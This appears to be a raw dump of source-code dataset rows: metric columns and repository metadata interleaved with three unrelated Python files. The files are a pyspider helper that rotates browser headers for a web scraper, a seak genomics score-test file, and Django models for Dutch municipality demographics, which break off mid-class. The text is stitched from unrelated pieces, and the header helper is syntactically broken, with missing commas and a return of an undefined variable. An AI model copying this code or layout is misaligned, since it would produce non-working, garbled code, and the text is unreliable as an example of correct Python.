| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
faad8c08c7a97f3884efa674018fb633dbc58019
| 4,623
|
py
|
Python
|
pyspider/libs/header_switch.py
|
jiangshiyong/pyspider
|
8f7d2a01c43046f7491f95b3fbfffffeaf17192f
|
[
"Apache-2.0"
] | 1
|
2021-09-04T07:11:32.000Z
|
2021-09-04T07:11:32.000Z
|
pyspider/libs/header_switch.py
|
jiangshiyong/pyspider
|
8f7d2a01c43046f7491f95b3fbfffffeaf17192f
|
[
"Apache-2.0"
] | null | null | null |
pyspider/libs/header_switch.py
|
jiangshiyong/pyspider
|
8f7d2a01c43046f7491f95b3fbfffffeaf17192f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Created on 2017-10-18 11:52:26
import random
import time
class HeadersSelector(object):
"""
Header 中缺少几个字段 Host 和 Cookie
"""
headers_1 = {
"Proxy-Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"DNT": "1",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Referer": "https://www.baidu.com/s?wd=%BC%96%E7%A0%81&rsv_spt=1&rsv_iqid=0x9fcbc99a0000b5d7&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&rqlang=cn&tn=baiduhome_pg&rsv_enter=0&oq=If-None-Match&inputT=7282&rsv_t",
"Accept-Charset": "gb2312,gbk;q=0.7,utf-8;q=0.7,*;q=0.7",
} # 网上找的浏览器
headers_2 = {
"Proxy-Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0",
"Accept": "image/gif,image/x-xbitmap,image/jpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*",
"DNT": "1",
"Referer": "https://www.baidu.com/link?url=c-FMHf06-ZPhoRM4tWduhraKXhnSm_RzjXZ-ZTFnPAvZN",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
} # window 7 系统浏览器
headers_3 = {
"Proxy-Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "image/x-xbitmap,image/jpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*",
"DNT": "1",
"Referer": "https://www.baidu.com/s?wd=http%B4%20Pragma&rsf=1&rsp=4&f=1&oq=Pragma&tn=baiduhome_pg&ie=utf-8&usm=3&rsv_idx=2&rsv_pq=e9bd5e5000010",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.7,en;q=0.6",
} # Linux 系统 firefox 浏览器
headers_4 = {
"Proxy-Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"DNT": "1",
"Referer": "https://www.baidu.com/link?url=c-FMHf06-ZPhoRM4tWduhraKXhnSm_RzjXZ-ZTFnP",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.7,en;q=0.6",
} # Win10 系统 firefox 浏览器
headers_5 = {
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Referer": "https://www.baidu.com/link?url=c-FMHf06-ZPhoRM4tWduhraKXhnSm_RzjXZ-",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.7,en;q=0.6",
"Accept-Charset": "gb2312,gbk;q=0.7,utf-8;q=0.7,*;q=0.7",
} # Win10 系统 Chrome 浏览器
headers_6 = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.8",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"DNT": "1",
"Referer": "https://www.baidu.com/s?wd=If-None-Match&rsv_spt=1&rsv_iqid=0x9fcbc99a0000b5d7&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&rq",
"Accept-Charset": "gb2312,gbk;q=0.7,utf-8;q=0.7,*;q=0.7",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0",
} # win10 系统浏览器
def __init__(self):
pass
def select_header(self):
n = random.randint(1, 6)
switch={
1: self.headers_1
2: self.headers_2
3: self.headers_3
4: self.headers_4
5: self.headers_5
6: self.headers_6
}
headers = switch[n]
return headers1
| 48.663158
| 214
| 0.602639
| 725
| 4,623
| 3.794483
| 0.244138
| 0.022537
| 0.013086
| 0.039258
| 0.740458
| 0.740458
| 0.740458
| 0.719375
| 0.717557
| 0.692475
| 0
| 0.097226
| 0.196842
| 4,623
| 95
| 215
| 48.663158
| 0.643684
| 0.036556
| 0
| 0.458824
| 0
| 0.258824
| 0.669393
| 0.177914
| 0
| 0
| 0.00818
| 0
| 0
| 0
| null | null | 0.011765
| 0.023529
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fabe6ed2189577ffec866765cbf22388c95603a6
| 19,559
|
py
|
Python
|
tests/test_noK_dummy_data.py
|
HealthML/seak
|
6538cb53f8fb73741ece546b1bdc258fa880eaf6
|
[
"Apache-2.0"
] | 2
|
2020-07-15T12:46:44.000Z
|
2020-07-16T12:49:06.000Z
|
tests/test_noK_dummy_data.py
|
HealthML/seak
|
6538cb53f8fb73741ece546b1bdc258fa880eaf6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_noK_dummy_data.py
|
HealthML/seak
|
6538cb53f8fb73741ece546b1bdc258fa880eaf6
|
[
"Apache-2.0"
] | null | null | null |
# Note: all dummy data bim files start at 0 for position, even though file format should be 1-based.
def test_full_rank_continuous():
import time
import numpy as np
import pandas as pd
import pkg_resources
from seak import data_loaders
from seak import kernels
from seak import scoretest
data_path = pkg_resources.resource_filename('seak', 'data/')
# Path to veps
path_to_VEP_bed = data_path + "dummy_veps.bed"
path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
# Path to genotypes
path_to_covariates = data_path + "dummy_covariates_fixed.csv"
path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
# Path to regions
path_to_reference_genes_bed = data_path + "dummy_regions.bed"
# Load data
# VEPs
hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
hdf5_key='diffscore')
# Genotypes
plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
# Genes
ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
chrom_to_load=1, drop_non_numeric_chromosomes=True)
# Covariates
covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
path_to_covariates=path_to_covariates,
covariate_column_names=['cov1', 'cov2'])
# Overlap individuals: genotypes and covariates
print('Overlaps')
print('Individuals')
genotypes_covariates_intersection = data_loaders.intersect_ids(plink_loader.get_iids(), covariate_loader_csv.get_iids())
print(genotypes_covariates_intersection.shape)
print(genotypes_covariates_intersection)
# Overlap genotypes with VEPs
print('Genotypes')
#print(len(plink_loader.bim.index))
print(len(hdf5_loader.veps_index_df.index))
veps_genotypes_intersection = data_loaders.intersect_ids(hdf5_loader.get_vids(), plink_loader.get_vids())
print(len(veps_genotypes_intersection))
# Update respective instances
print('Updates')
#print('plink_loader.bim.shape', plink_loader.bim.shape)
plink_loader.update_variants(veps_genotypes_intersection)
#print('plink_loader.bim.shape', plink_loader.bim.shape)
print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
hdf5_loader.update_variants(veps_genotypes_intersection)
print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#print('plink_loader.fam.shape', plink_loader.fam.shape)
plink_loader.update_individuals(genotypes_covariates_intersection)
#print('plink_loader.fam.shape', plink_loader.fam.shape)
print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
covariate_loader_csv.update_individuals(genotypes_covariates_intersection)
print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
null_model = scoretest.ScoretestNoK(Y, X)
results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
for index, region in ucsc_region_loader.regions.iterrows():
t_test_gene_start = time.time()
temp_genotypes_info_dict = region.to_dict()
temp_genotypes, temp_vids = plink_loader.genotypes_by_region(region)
if temp_genotypes is None:
continue
G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
normalize=False, invert_encoding=True,
recode_maf=False)
if G is None:
continue
V = hdf5_loader.anno_by_id(temp_vids)
GV = kernels.diffscore_max(G, V, False)
temp_p_value = null_model.pv_alt_model(GV)
temp_genotypes_info_dict['p_value'] = temp_p_value
temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
t_test_gene_end = time.time()
temp_time = float(t_test_gene_end - t_test_gene_start)
temp_genotypes_info_dict['time'] = temp_time
results = results.append(temp_genotypes_info_dict, ignore_index=True)
# results.to_csv('./test_full_rank_continuous.csv')
print(results)
reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
print(np.corrcoef(reference_result['p_value'], results['p_value']))
print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
# def test_full_rank_continuous_exclude_individuals():
# import time
#
# import numpy as np
# import pandas as pd
# import pkg_resources
#
# from seak import data_loaders
# from seak import kernels
# from seak import scoretest
#
# data_path = pkg_resources.resource_filename('seak', 'data/')
#
# # Path to veps
# path_to_VEP_bed = data_path + "dummy_veps.bed"
# path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
#
# # Path to genotypes
# path_to_covariates = data_path + "dummy_covariates_fixed.csv"
# path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
#
# # Path to regions
# path_to_reference_genes_bed = data_path + "dummy_regions.bed"
#
# # Load data
# # VEPs
# hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
# hdf5_key='diffscore')
#
# # Genotypes
# plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
#
# # Genes
# ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
# chrom_to_load=1, drop_non_numeric_chromosomes=True)
#
# # Covariates
# covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
# path_to_covariates=path_to_covariates,
# covariate_column_names=['cov1', 'cov2'])
#
# # Exclude individuals
# plink_loader.update_individuals(['test'], exclude=True)
# # Exclude variants
# # plink_loader.update_variants(coordinates={"chrom": '1', "start": 0, "end": 10})
# # print(plink_loader.bim.index)
#
# # Overlap individuals: genotypes and covariates
# print('Overlaps')
# print('Individuals')
# genotypes_covariates_intersection = plink_loader.get_iids().intersection(covariate_loader_csv.get_iids())
#
# print(genotypes_covariates_intersection.shape)
# print(genotypes_covariates_intersection)
#
# # Overlap genotypes with VEPs
# print('Genotypes')
# #print(len(plink_loader.bim.index))
# print(len(hdf5_loader.veps_index_df.index))
# veps_genotypes_intersection = hdf5_loader.veps_index_df.index.intersection(plink_loader.bim.index)
# print(len(veps_genotypes_intersection))
#
# # Update respective instances
# print('Updates')
# #print('plink_loader.bim.shape', plink_loader.bim.shape)
# plink_loader.update_variants(veps_genotypes_intersection)
# #print('plink_loader.bim.shape', plink_loader.bim.shape)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# hdf5_loader.update_variants(veps_genotypes_intersection)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# #print('plink_loader.fam.shape', plink_loader.fam.shape)
# plink_loader.update_individuals(genotypes_covariates_intersection)
# #print('plink_loader.fam.shape', plink_loader.fam.shape)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
# covariate_loader_csv.update_individuals(genotypes_covariates_intersection)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
#
# Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
# null_model = scoretest.ScoretestNoK(Y, X)
# results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
#
# for index, region in ucsc_region_loader.regions.iterrows():
# t_test_gene_start = time.time()
# temp_genotypes_info_dict = region.to_dict()
# temp_genotypes, temp_vids = plink_loader.genotypes_by_region(region)
# if temp_genotypes is None:
# continue
#
# G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
# normalize=False, invert_encoding=True,
# recode_maf=False)
# if G is None:
# continue
#
# V = hdf5_loader.anno_by_id(temp_vids)
#
# GV = kernels.diffscore_max(G, V, False)
# temp_p_value = null_model.pv_alt_model(GV)
# temp_genotypes_info_dict['p_value'] = temp_p_value
# temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
# t_test_gene_end = time.time()
# temp_time = float(t_test_gene_end - t_test_gene_start)
# temp_genotypes_info_dict['time'] = temp_time
# results = results.append(temp_genotypes_info_dict, ignore_index=True)
#
# # results.to_csv('./test_full_rank_continuous.csv')
# print(results)
# reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
# print(np.corrcoef(reference_result['p_value'], results['p_value']))
# print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
# assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
# def test_full_rank_continuous_genotypes_by_id():
# import time
#
# import numpy as np
# import pandas as pd
# import pkg_resources
#
# from seak import data_loaders
# from seak import kernels
# from seak import scoretest
#
# data_path = pkg_resources.resource_filename('seak', 'data/')
#
# # Path to veps
# path_to_VEP_bed = data_path + "dummy_veps.bed"
# path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
#
# # Path to genotypes
# path_to_covariates = data_path + "dummy_covariates_fixed.csv"
# path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
#
# # Path to regions: not needed here, as I test genotype loading by id not region (genes)
# # path_to_reference_genes_bed = data_path + "dummy_regions.bed"
#
# # Load data
# # VEPs
# hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
# hdf5_key='diffscore')
#
# # Genotypes
# plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
#
# # Genes: not needed here, as I test genotype loading by id not region (genes)
# # ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
# # chrom_to_load=1, drop_non_numeric_chromosomes=True)
#
# # Covariates
# covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
# path_to_covariates=path_to_covariates,
# covariate_column_names=['cov1', 'cov2'])
#
# # Overlap individuals: genotypes and covariates
# print('Overlaps')
# print('Individuals')
# # genotypes_covariates_intersection = plink_loader.get_iids().intersection(covariate_loader_csv.get_iids())
# genotypes_covariates_intersection = data_loaders.intersect_ids(plink_loader.get_iids(), covariate_loader_csv.get_iids())
#
# print(genotypes_covariates_intersection.shape)
# print(genotypes_covariates_intersection)
#
# # Overlap genotypes with VEPs
# print('Genotypes')
# # print(len(plink_loader.bim.index))
# print(len(hdf5_loader.veps_index_df.index))
# # veps_genotypes_intersection = hdf5_loader.get_vids().intersection(plink_loader.get_vids())
# veps_genotypes_intersection = data_loaders.intersect_ids(plink_loader.get_iids(), covariate_loader_csv.get_iids())
# print(len(veps_genotypes_intersection))
#
# # Update respective instances
# print('Updates')
# # print('plink_loader.bim.shape', plink_loader.bim.shape)
# plink_loader.update_variants(veps_genotypes_intersection)
# # print('plink_loader.bim.shape', plink_loader.bim.shape)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# hdf5_loader.update_variants(veps_genotypes_intersection)
# print('hdf5_loader.veps_index_df.shape', hdf5_loader.veps_index_df.shape)
#
# # print('plink_loader.fam.shape', plink_loader.fam.shape)
# plink_loader.update_individuals(genotypes_covariates_intersection)
# # print('plink_loader.fam.shape', plink_loader.fam.shape)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
# covariate_loader_csv.update_individuals(genotypes_covariates_intersection)
# print('covariate_loader_csv.cov.shape', covariate_loader_csv.cov.shape)
#
# Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
# null_model = scoretest.ScoretestNoK(Y, X)
# results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
# snps = ['snp' + str(index) for index in range(0, 100)]
# # Comment: the first set only contains 9 SNVs; this in an artifact of the fact, that usually plink bed files are
# # 1 based but here 0 based; to make this test match with the previous results I adapted the code accordingly
# for index in range(1, 92, 10):
# curr_snps = snps[index:index+10]
# t_test_gene_start = time.time()
# temp_genotypes_info_dict = dict()
# temp_genotypes, temp_vids = plink_loader.genotypes_by_id(curr_snps)
#
# if temp_genotypes is None:
# continue
#
# G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
# normalize=False, invert_encoding=True,
# recode_maf=False)
# if G is None:
# continue
#
# V = hdf5_loader.anno_by_id(temp_vids)
#
# GV = kernels.diffscore_max(G, V, False)
# temp_p_value = null_model.pv_alt_model(GV)
# temp_genotypes_info_dict['p_value'] = temp_p_value
# temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
# t_test_gene_end = time.time()
# temp_time = float(t_test_gene_end - t_test_gene_start)
# temp_genotypes_info_dict['time'] = temp_time
# results = results.append(temp_genotypes_info_dict, ignore_index=True)
#
# # results.to_csv('./test_full_rank_continuous.csv')
# print(results)
# reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
# print(np.corrcoef(reference_result['p_value'], results['p_value']))
# print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
# assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
def test_full_rank_continuous_automatic_intersection():
import time
import numpy as np
import pandas as pd
import pkg_resources
from seak import data_loaders
from seak import kernels
from seak import scoretest
data_path = pkg_resources.resource_filename('seak', 'data/')
# Path to veps
path_to_VEP_bed = data_path + "dummy_veps.bed"
path_to_VEP_hdf5 = data_path + "dummy_veps.hdf5"
# Path to genotypes
path_to_covariates = data_path + "dummy_covariates_fixed.csv"
path_to_plink_files_with_prefix = data_path + "full_rank_continuous"
# Path to regions
path_to_reference_genes_bed = data_path + "dummy_regions.bed"
# Load data
# VEPs
hdf5_loader = data_loaders.Hdf5Loader(path_to_vep_bed=path_to_VEP_bed, path_to_vep_hdf5=path_to_VEP_hdf5,
hdf5_key='diffscore')
# Genotypes
plink_loader = data_loaders.VariantLoaderSnpReader(path_to_plink_files_with_prefix+'.bed')
# Genes
ucsc_region_loader = data_loaders.BEDRegionLoader(path_to_regions_UCSC_BED=path_to_reference_genes_bed,
chrom_to_load=1, drop_non_numeric_chromosomes=True)
# Covariates
covariate_loader_csv = data_loaders.CovariatesLoaderCSV(phenotype_of_interest='pheno_full_rank_continuous',
path_to_covariates=path_to_covariates,
covariate_column_names=['cov1', 'cov2'])
data_loaders.intersect_and_update_datasets('noK', plink_loader, covariate_loader_csv, hdf5_loader)
Y, X = covariate_loader_csv.get_one_hot_covariates_and_phenotype(test_type='noK')
null_model = scoretest.ScoretestNoK(Y, X)
results = pd.DataFrame(columns=['name', 'chrom', 'start', 'end', 'p_value', 'n_SNVs', 'time'])
for index, region in ucsc_region_loader.regions.iterrows():
t_test_gene_start = time.time()
temp_genotypes_info_dict = region.to_dict()
temp_genotypes, temp_vids = plink_loader.genotypes_by_region(region)
if temp_genotypes is None:
continue
G, temp_vids = data_loaders.VariantLoader.preprocess_genotypes(temp_genotypes, temp_vids, impute_mean=True,
normalize=False, invert_encoding=True,
recode_maf=False)
if G is None:
continue
V = hdf5_loader.anno_by_id(temp_vids)
GV = kernels.diffscore_max(G, V, False)
temp_p_value = null_model.pv_alt_model(GV)
temp_genotypes_info_dict['p_value'] = temp_p_value
temp_genotypes_info_dict['n_SNVs'] = G.shape[1]
t_test_gene_end = time.time()
temp_time = float(t_test_gene_end - t_test_gene_start)
temp_genotypes_info_dict['time'] = temp_time
results = results.append(temp_genotypes_info_dict, ignore_index=True)
# results.to_csv('./test_full_rank_continuous.csv')
print(results)
reference_result = pd.read_csv(data_path + 'reference_results/test_full_rank_continuous.csv', index_col=0)
print(np.corrcoef(reference_result['p_value'], results['p_value']))
print(np.all((np.isclose(reference_result['p_value'], results['p_value']))))
assert np.all((np.isclose(reference_result['p_value'], results['p_value']))), 'The last change in code changes the result!!'
| 46.791866
| 130
| 0.680454
| 2,469
| 19,559
| 4.996355
| 0.081815
| 0.033074
| 0.042315
| 0.034047
| 0.942769
| 0.940743
| 0.937905
| 0.934987
| 0.934987
| 0.931177
| 0
| 0.006164
| 0.220359
| 19,559
| 417
| 131
| 46.904077
| 0.802807
| 0.577995
| 0
| 0.857143
| 0
| 0
| 0.104337
| 0.040226
| 0
| 0
| 0
| 0
| 0.016807
| 1
| 0.016807
| false
| 0
| 0.117647
| 0
| 0.134454
| 0.151261
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fae533c9ef043a7f415dac349e86bc8d8445b8bf
| 31,087
|
py
|
Python
|
server/infoviz/models.py
|
wlongxiang/InfoViz
|
b986f4cadc4cb8dc0d4a64bafe3f35e91eb362b4
|
[
"MIT"
] | 1
|
2020-03-10T20:24:12.000Z
|
2020-03-10T20:24:12.000Z
|
server/infoviz/models.py
|
wlongxiang/InfoViz
|
b986f4cadc4cb8dc0d4a64bafe3f35e91eb362b4
|
[
"MIT"
] | 5
|
2021-03-10T09:50:56.000Z
|
2022-02-27T00:36:58.000Z
|
server/infoviz/models.py
|
wlongxiang/InfoViz
|
b986f4cadc4cb8dc0d4a64bafe3f35e91eb362b4
|
[
"MIT"
] | 2
|
2020-02-11T08:50:54.000Z
|
2020-02-20T10:06:56.000Z
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey and OneToOneField has `on_delete` set to the desired behavior
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class AuthGroup(models.Model):
name = models.CharField(unique=True, max_length=150)
class Meta:
managed = False
db_table = 'auth_group'
class AuthGroupPermissions(models.Model):
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
permission = models.ForeignKey('AuthPermission', models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_group_permissions'
unique_together = (('group', 'permission'),)
class AuthPermission(models.Model):
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING)
codename = models.CharField(max_length=100)
name = models.CharField(max_length=255)
class Meta:
managed = False
db_table = 'auth_permission'
unique_together = (('content_type', 'codename'),)
class AuthUser(models.Model):
password = models.CharField(max_length=128)
last_login = models.DateTimeField(blank=True, null=True)
is_superuser = models.BooleanField()
username = models.CharField(unique=True, max_length=150)
first_name = models.CharField(max_length=30)
email = models.CharField(max_length=254)
is_staff = models.BooleanField()
is_active = models.BooleanField()
date_joined = models.DateTimeField()
last_name = models.CharField(max_length=150)
class Meta:
managed = False
db_table = 'auth_user'
class AuthUserGroups(models.Model):
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_user_groups'
unique_together = (('user', 'group'),)
class AuthUserUserPermissions(models.Model):
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
permission = models.ForeignKey(AuthPermission, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_user_user_permissions'
unique_together = (('user', 'permission'),)
class DjangoAdminLog(models.Model):
action_time = models.DateTimeField()
object_id = models.TextField(blank=True, null=True)
object_repr = models.CharField(max_length=200)
change_message = models.TextField()
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING, blank=True, null=True)
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
action_flag = models.PositiveSmallIntegerField()
class Meta:
managed = False
db_table = 'django_admin_log'
class DjangoContentType(models.Model):
app_label = models.CharField(max_length=100)
model = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'django_content_type'
unique_together = (('app_label', 'model'),)
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_migrations'
class DjangoSession(models.Model):
session_key = models.CharField(primary_key=True, max_length=40)
session_data = models.TextField()
expire_date = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_session'
class Gemeente(models.Model):
id = models.AutoField(unique=True, primary_key=True)
gemeentenaam = models.TextField(blank=True, null=True)
province = models.TextField(blank=True, null=True)
electricity = models.IntegerField(blank=True, null=True)
gas = models.IntegerField(blank=True, null=True)
totaalmannenenvrouwen = models.IntegerField(db_column='Totaalmannenenvrouwen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar = models.IntegerField(db_column='0tot5jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar = models.IntegerField(db_column='5tot10jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar = models.IntegerField(db_column='10tot15jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar = models.IntegerField(db_column='15tot20jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar = models.IntegerField(db_column='20tot25jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar = models.IntegerField(db_column='25tot30jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar = models.IntegerField(db_column='30tot35jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar = models.IntegerField(db_column='35tot40jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar = models.IntegerField(db_column='40tot45jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar = models.IntegerField(db_column='45tot50jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar = models.IntegerField(db_column='50tot55jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar = models.IntegerField(db_column='55tot60jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar = models.IntegerField(db_column='60tot65jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar = models.IntegerField(db_column='65tot70jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar = models.IntegerField(db_column='70tot75jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar = models.IntegerField(db_column='75tot80jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar = models.IntegerField(db_column='80tot85jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
